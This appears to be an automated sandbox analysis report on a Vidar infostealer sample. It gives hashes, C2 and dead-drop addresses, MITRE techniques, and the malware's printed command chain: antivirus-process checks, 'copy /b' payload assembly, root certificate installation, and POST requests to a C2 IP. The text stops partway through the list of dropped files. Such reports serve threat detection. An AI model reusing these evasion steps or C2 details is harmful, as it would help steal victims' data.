vidar | d80007837ee60fe9537c76e6a3d45005a86ddc3e066e608b57e1d4430cb96df4

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
29/01/2025, 21:47 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lem.exe
Size

1.0MB
MD5

7723d62c8a6c95004f746afa54e8460b
SHA1

01dff9bfe0bbb49ce51e611cbb9233d74ba1a596
SHA256

d80007837ee60fe9537c76e6a3d45005a86ddc3e066e608b57e1d4430cb96df4
SHA512

b55fef5246a4ada84a799e9e3ae6026ecc47566bf6150c3377d9dad743ff7f0c5a17759d0c1a121e4d530dae9ad60db0d21168d0180bcd63c6160f5927e84fcd
SSDEEP

24576:s7wiALdYAa0xGv7L0TDQUjHA90zWy64aL/MxED:cIuAaoTkU0x1L5

Score

10^/10

vidar discovery stealer

Malware Config

Extracted

Family

vidar

https://t.me/m08mbk

https://steamcommunity.com/profiles/76561199820567237

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0

Signatures

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Executes dropped EXE 1 IoCs

pid	Process
1860	Nest.com

Loads dropped DLL 1 IoCs

pid	Process
2364	cmd.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2088	tasklist.exe
996	tasklist.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\ContributorsCardiff	lem.exe
File opened for modification	C:\Windows\PoultryPromoting	lem.exe
File opened for modification	C:\Windows\TensionLine	lem.exe
File opened for modification	C:\Windows\EaMeters	lem.exe
File opened for modification	C:\Windows\SeemsBedding	lem.exe
File opened for modification	C:\Windows\OpponentSpent	lem.exe
File opened for modification	C:\Windows\PurchasedTrack	lem.exe
File opened for modification	C:\Windows\HopesQuoted	lem.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lem.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nest.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Modifies system certificate store 2 TTPs 3 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Nest.com
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Nest.com
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Nest.com

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1860	Nest.com
1860	Nest.com
1860	Nest.com

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	996	tasklist.exe
Token: SeDebugPrivilege	2088	tasklist.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1860	Nest.com
1860	Nest.com
1860	Nest.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1860	Nest.com
1860	Nest.com
1860	Nest.com

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2756 wrote to memory of 2364	2756	lem.exe	31
PID 2756 wrote to memory of 2364	2756	lem.exe	31
PID 2756 wrote to memory of 2364	2756	lem.exe	31
PID 2756 wrote to memory of 2364	2756	lem.exe	31
PID 2364 wrote to memory of 996	2364	cmd.exe	33
PID 2364 wrote to memory of 996	2364	cmd.exe	33
PID 2364 wrote to memory of 996	2364	cmd.exe	33
PID 2364 wrote to memory of 996	2364	cmd.exe	33
PID 2364 wrote to memory of 1836	2364	cmd.exe	34
PID 2364 wrote to memory of 1836	2364	cmd.exe	34
PID 2364 wrote to memory of 1836	2364	cmd.exe	34
PID 2364 wrote to memory of 1836	2364	cmd.exe	34
PID 2364 wrote to memory of 2088	2364	cmd.exe	36
PID 2364 wrote to memory of 2088	2364	cmd.exe	36
PID 2364 wrote to memory of 2088	2364	cmd.exe	36
PID 2364 wrote to memory of 2088	2364	cmd.exe	36
PID 2364 wrote to memory of 2236	2364	cmd.exe	37
PID 2364 wrote to memory of 2236	2364	cmd.exe	37
PID 2364 wrote to memory of 2236	2364	cmd.exe	37
PID 2364 wrote to memory of 2236	2364	cmd.exe	37
PID 2364 wrote to memory of 2044	2364	cmd.exe	38
PID 2364 wrote to memory of 2044	2364	cmd.exe	38
PID 2364 wrote to memory of 2044	2364	cmd.exe	38
PID 2364 wrote to memory of 2044	2364	cmd.exe	38
PID 2364 wrote to memory of 2300	2364	cmd.exe	39
PID 2364 wrote to memory of 2300	2364	cmd.exe	39
PID 2364 wrote to memory of 2300	2364	cmd.exe	39
PID 2364 wrote to memory of 2300	2364	cmd.exe	39
PID 2364 wrote to memory of 2484	2364	cmd.exe	40
PID 2364 wrote to memory of 2484	2364	cmd.exe	40
PID 2364 wrote to memory of 2484	2364	cmd.exe	40
PID 2364 wrote to memory of 2484	2364	cmd.exe	40
PID 2364 wrote to memory of 632	2364	cmd.exe	41
PID 2364 wrote to memory of 632	2364	cmd.exe	41
PID 2364 wrote to memory of 632	2364	cmd.exe	41
PID 2364 wrote to memory of 632	2364	cmd.exe	41
PID 2364 wrote to memory of 1212	2364	cmd.exe	42
PID 2364 wrote to memory of 1212	2364	cmd.exe	42
PID 2364 wrote to memory of 1212	2364	cmd.exe	42
PID 2364 wrote to memory of 1212	2364	cmd.exe	42
PID 2364 wrote to memory of 1860	2364	cmd.exe	43
PID 2364 wrote to memory of 1860	2364	cmd.exe	43
PID 2364 wrote to memory of 1860	2364	cmd.exe	43
PID 2364 wrote to memory of 1860	2364	cmd.exe	43
PID 2364 wrote to memory of 3028	2364	cmd.exe	44
PID 2364 wrote to memory of 3028	2364	cmd.exe	44
PID 2364 wrote to memory of 3028	2364	cmd.exe	44
PID 2364 wrote to memory of 3028	2364	cmd.exe	44

C:\Users\Admin\AppData\Local\Temp\lem.exe
"C:\Users\Admin\AppData\Local\Temp\lem.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy Partnership Partnership.cmd & Partnership.cmd
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:996
- - C:\Windows\SysWOW64\findstr.exe
    findstr /I "opssvc wrsa"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1836
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- - C:\Windows\SysWOW64\findstr.exe
    findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2236
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c md 251969
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2044
- - C:\Windows\SysWOW64\extrac32.exe
    extrac32 /Y /E Hypothetical
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2300
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V "corner" Triangle
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c copy /b 251969\Nest.com + Duplicate + Pencil + Strict + Creature + Monroe + Live + National + Bw + Filing + Bringing 251969\Nest.com
    3⤵
    - System Location Discovery: System Language Discovery
    PID:632
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c copy /b ..\Harbor + ..\Occur + ..\Decision + ..\Friendly + ..\Dam + ..\Volleyball + ..\Towers A
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1212
- - C:\Users\Admin\AppData\Local\Temp\251969\Nest.com
    Nest.com A
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1860
- - C:\Windows\SysWOW64\choice.exe
    choice /d y /t 5
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3028

Network

DNS

LStubkzgtHCayn.LStubkzgtHCayn

Nest.com

Remote address:

8.8.8.8:53

Request

LStubkzgtHCayn.LStubkzgtHCayn

IN A

Response
DNS

t.me

Nest.com

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
DNS

steamcommunity.com

Nest.com

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

104.123.95.227
GET

https://steamcommunity.com/profiles/76561199820567237

Nest.com

Remote address:

104.123.95.227:443

Request

GET /profiles/76561199820567237 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Wed, 29 Jan 2025 21:47:46 GMT
Content-Length: 35235
Connection: keep-alive
Set-Cookie: sessionid=6cc787d3813d1cf45a8736d9; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
GET

https://95.217.241.64/

Nest.com

Remote address:

95.217.241.64:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Host: 95.217.241.64
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 29 Jan 2025 21:47:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://95.217.241.64/

Nest.com

Remote address:

95.217.241.64:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----l6xtrq1vs0zm7q9hd26x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Host: 95.217.241.64
Content-Length: 255
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 29 Jan 2025 21:47:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

149.154.167.99:443

t.me

tls

Nest.com

385 B
219 B
5
5
149.154.167.99:443

t.me

tls

Nest.com

347 B
219 B
5
5
149.154.167.99:443

t.me

tls

Nest.com

288 B
219 B
5
5
149.154.167.99:443

t.me

Nest.com

190 B
92 B
4
2
104.123.95.227:443

https://steamcommunity.com/profiles/76561199820567237

tls, http

Nest.com

1.5kB
42.7kB
23
36

HTTP Request

GET https://steamcommunity.com/profiles/76561199820567237

HTTP Response

200
95.217.241.64:443

https://95.217.241.64/

tls, http

Nest.com

1.5kB
2.3kB
10
9

HTTP Request

GET https://95.217.241.64/

HTTP Response

200
95.217.241.64:443

https://95.217.241.64/

tls, http

Nest.com

1.2kB
658 B
7
6

HTTP Request

POST https://95.217.241.64/

HTTP Response

200
95.217.241.64:443

tls

Nest.com

1.2kB
658 B
6
6

8.8.8.8:53

LStubkzgtHCayn.LStubkzgtHCayn

dns

Nest.com

75 B
150 B
1
1

DNS Request

LStubkzgtHCayn.LStubkzgtHCayn
8.8.8.8:53

t.me

dns

Nest.com

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

steamcommunity.com

dns

Nest.com

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

104.123.95.227

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0700d08b19e9f5ebd29b29ff558ec335

SHA1
abf6dcc95665d858a8ee771463a1a7f98395061e

SHA256
5c4d9679fe28186d0324df93865f6b5a0172881100025c83ee696515f2dd89a1

SHA512
6481a3f6776c33e6e8a4c5c0768d21b970eec7145ef5f6c36bf026d170a46a467ad875bd2a5e60e1295f8f9e69ee0d009c516dd1744f29d1bc20266885d3cb6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\251969\A

Filesize
395KB

MD5
7efce5444470a8b61e518441447965ed

SHA1
bd47a6b7700cd8594bd7aa33bcadf17b9a999b04

SHA256
bd11f1fd341e6c3751184d79fedf64abb39053c2eb78ad108a77f6866aa3b07e

SHA512
f4d9490300ce0b4e047206ee76720224ceec6e27ee417d1e1d936b49f1834bffb1491997290c12d0d64e2527afa405b21cae5a18dce1ae8a3dc9f1685cbd5175

Download Submit
C:\Users\Admin\AppData\Local\Temp\251969\Nest.com

Filesize
146B

MD5
cc5f40a1b921d763fe184ed1d4998262

SHA1
2aa62b4f9839765ce605fe558c814c901bdf2f44

SHA256
1fb0e4a44af60c74ac6cf19e8cdea307688a2bd9c5c0f2bc2b116d25edffb227

SHA512
59afe9301ecd18a629a2c84d194bf508fb2bef71f2a6b802adec05d25875c29fc325ef167af123bd343a73085693a3152a150c2edce73001b2d524d368734c47

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bringing

Filesize
33KB

MD5
65f5234de76fd8615b9adf0b88e21d84

SHA1
cbe33f603402c71b4574da4b1a8b2ae8fa3c3c47

SHA256
962de6ba564d6914c90daa6d04b3930629a3cd721f2e9b4b41c250c7942585c9

SHA512
54947e4274124357384895fa73c0a4a8a25e11446d46f409df6042cf6e07d8f6ac9822b215205b047c73a5cedc8a12a0d32732d6370938d9a79a2ba714ac17ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bw

Filesize
146KB

MD5
489fd8f090c993a9c96cbeb1838a2b37

SHA1
830ffa953bd15bc2b49e5aee30b7f9b7cf25c7ed

SHA256
be6ae6028970bb4c0095722dcb2a9bbe7a7cdfaaabe92bb375e820e6464dc28e

SHA512
4b82a52eeedb7c2fa69864397176197d7d558787f02070be1aabcbb7debcf7e348f690a61c0150af1fe3c2460e846826f0159819dc0095441247ac7c6a425929

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3555.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Creature

Filesize
80KB

MD5
bbb46f9794c2aed10043395a61fecef3

SHA1
f79ae78273f3d2d75c52b596332ec253280df2b9

SHA256
6a871aefa4de74871b571945b6dda6d6c70e8aeb195b882d7f8e19e6a0596ee9

SHA512
342d8c0feba45ff2b240ec4d2324ade4759f365e608ccf8a926d90eb23c9072ec671e42b5fe1fb5367b71b7c3678a104dae0f24c2857346087c636abb8369548

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dam

Filesize
60KB

MD5
7bd3a18b951a9c07697b97757819da29

SHA1
fec6068943b6bef9d5096edf0fc97dba6922cc57

SHA256
a0b876c66b64db69a7dc6e7a990b519ab6464c093b3dff4e8b84fa45c66d7ae5

SHA512
c0aac00d9beb41e1aca31313487f7395a209e1a5e682ece40ac1bef0431f9411566629c5917801a8ad609728bc6ee985d2a164f890b0fa63165b807f635ac1ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\Decision

Filesize
67KB

MD5
34f9fddd46ee2897360494d5a46d47bd

SHA1
5a6ab613aa1033770ab89b7ec976af7fb3e01100

SHA256
ff320c3a14755cba5e0a416dc5bc9d6a7643969a2e7c91ef126d7ff1ffd8260c

SHA512
c63f925f78601aec9c0203c4486948ff4842a1b16ff1b6784d9dcd8f3fd33d28d7f12b9a5d672694854b5dcc5eb93522196669a71bd18f78c93d0356e431156c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Duplicate

Filesize
119KB

MD5
b1c10291f8c9976fad3a4c58862687ab

SHA1
24bfec4c8304ec25cff2f500626ed45d3b83ab8b

SHA256
02996806a434d6af4c174162cff350e6751566aef3764b6a637c01e25eca97f7

SHA512
d4e618b450cfe2c1cc8a30a075268376020a13429d83a83a3595b1b8364ad19cab12a67168295aa33a99be2b48c95c2bb8b47e206d37ee6902f9f6c731d6ea71

Download Submit
C:\Users\Admin\AppData\Local\Temp\Filing

Filesize
90KB

MD5
3a48be4c37ce363312eba30fe6ea3f43

SHA1
32d0da42bb09e474286d30347c2d0d52d82fd25d

SHA256
b4d0b2d5c0fdf30bb5cceaf8d5432569648e97dfa9445fa8c949cea96a45e35c

SHA512
053ec789fcb93d91b4a2a1592a52e644ba012b2f05ec9a85aa535f33cb1add40077390d1cd3d7355765924968ce44d3bf52137c32a30b7135b3062a8c1866f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\Friendly

Filesize
52KB

MD5
ef989bb93d334f9115d5d8bc2aa18ad9

SHA1
ed76a1aea64e60338133f83fcad37ca54b343e9e

SHA256
842894941d445d388a0289eca58b76561b8e179938bc4cff0b8281a16fca6e4c

SHA512
749e8f695cb3a6931bdb30523190976939ab5f62fc8515b21ab7568cf5ce5c0d98bafcc8a1245d62a92a5228e45943e86b4630cd16aaacfa15ed0b8c2bed8f6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Harbor

Filesize
76KB

MD5
a576e23abea2187be6b3ae5821d4b1cd

SHA1
c5a80de2490c3377c2061038bd423e02c1276261

SHA256
b584f696b5f65ba1cf51c5402793bfe5bfac22cbbe28a9efa29e4f85100bb59e

SHA512
80cbb974ca22ee8de42db3c9bc4b94432e9fc8f348b63ecc20d60d3448f06da892bea24f51c77971150c06d2b39e7dc48a3d3cb48c7ce2ea452ea94ebd1e5669

Download Submit
C:\Users\Admin\AppData\Local\Temp\Hypothetical

Filesize
478KB

MD5
a02f07619668ea87fd406ea121672607

SHA1
0174672e04ef3d79be2f32dcc789ae8be814ecfc

SHA256
163c9592018647803cf70d5369670fb9250bba6b1b3332becf3b222edf8231ae

SHA512
0cd47f26f6a40ac95792d971c2794c91eb0b90c25778e830ac8d64142e23db064279ef1e721884e9e59c910dfa0cd5489bc47621a8c127372fd9fb6559143ecb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Live

Filesize
54KB

MD5
2e160d28a49d658caa60b94e09966fd4

SHA1
54e6d9b1a34894ce41a9253f4cbcf683c82a531f

SHA256
050ae659062cb624c473f8c182df338a25aca9f82389a77e507981ce0e967e3c

SHA512
b01774b8632d4046a5272cd855925d96dc3e8f42e4611e8ea3dc25e7ca6937b3b2b0887e5677c354c9bcf15a60cac4b75769479f63be127d437288fca2d1fbb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Monroe

Filesize
72KB

MD5
89075bf7ba81d092f89aa205ff8fce93

SHA1
7b2b89301b5305b36960e5d1079a94e90d1b2660

SHA256
60a08439f59887bff0655f3601eb9e14eec442c66d35277316facc9a103be60b

SHA512
4f170a7d3ebd9575a35111f6c6449965f223515b66d9688f0ce775bcccc6ffd3a1708437d07c5a809cf9dbffff38cdf1f85f76a5ff3bf6caafa2caa8d68cd470

Download Submit
C:\Users\Admin\AppData\Local\Temp\National

Filesize
100KB

MD5
2efdae7cb3f9b818f246dc4ad2706979

SHA1
b53742196460e0b05b1095bcf508e894bd8fe043

SHA256
23d136b8263df5ac26828943cb237c9ea73859c269b9f05b0301e67624d18461

SHA512
19bff8dbb78018caf814a4818671cfd1b684e6a7bf75274f90c85e914286654905b5e5784cad8829b1e960f017b93a0bd1512a6fcd7ed4e1ed1e9931d0b9cba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Occur

Filesize
51KB

MD5
7b2c77e47ee9c73c5bd85c0d37cf661b

SHA1
54abe6990ef0910d74d174305948ca8a4f51d1c7

SHA256
70fbe44522e30c2a3fdf46337cbe81c7edf88e0fa548d0e6360bedab86636cbb

SHA512
d28c11d3ff6d5e91ed2a0254c3342a0dbefee89053053405e61c909b5f6ceff2ab62fcc77117dfa91a803c3d68d1145c48481f18de55baea2b4f344ffa142a1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Partnership

Filesize
28KB

MD5
5067f1462ec31dd657e36184946a799d

SHA1
fba8e3427ce1b3e9d1e0a2e4870b91d0e5599716

SHA256
434a2a49c3dda69322eaf44b497b761a3d2afb43861a8f754e6b5958adc34e0d

SHA512
614317837cfdd1ee887c526a2661b688f76775bf8348c75e53eaa9621a801d0a6fa824de21c0676471b746e2bd3e27f7630aa6e85392d7c361982004feb3b781

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pencil

Filesize
119KB

